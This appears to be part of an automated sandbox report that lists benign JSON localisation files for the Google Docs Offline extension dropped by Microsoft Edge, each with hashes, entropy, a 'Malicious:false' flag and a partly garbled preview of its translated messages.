                                                                                                                                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                  MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                  SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                  SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                  SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                  MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                  SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                  SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                  SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                  MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                  SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                  SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                  SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                  MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                  SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                  SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                  SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                  MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                  SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                  SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                  SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                  MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                  SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                  SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                  SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                  MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                  SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                  SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                  SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                  MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                  SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                  SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                  SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                  MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                  SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                  SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                  SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                  MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                  SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                  SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                  SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                  Malicious:false
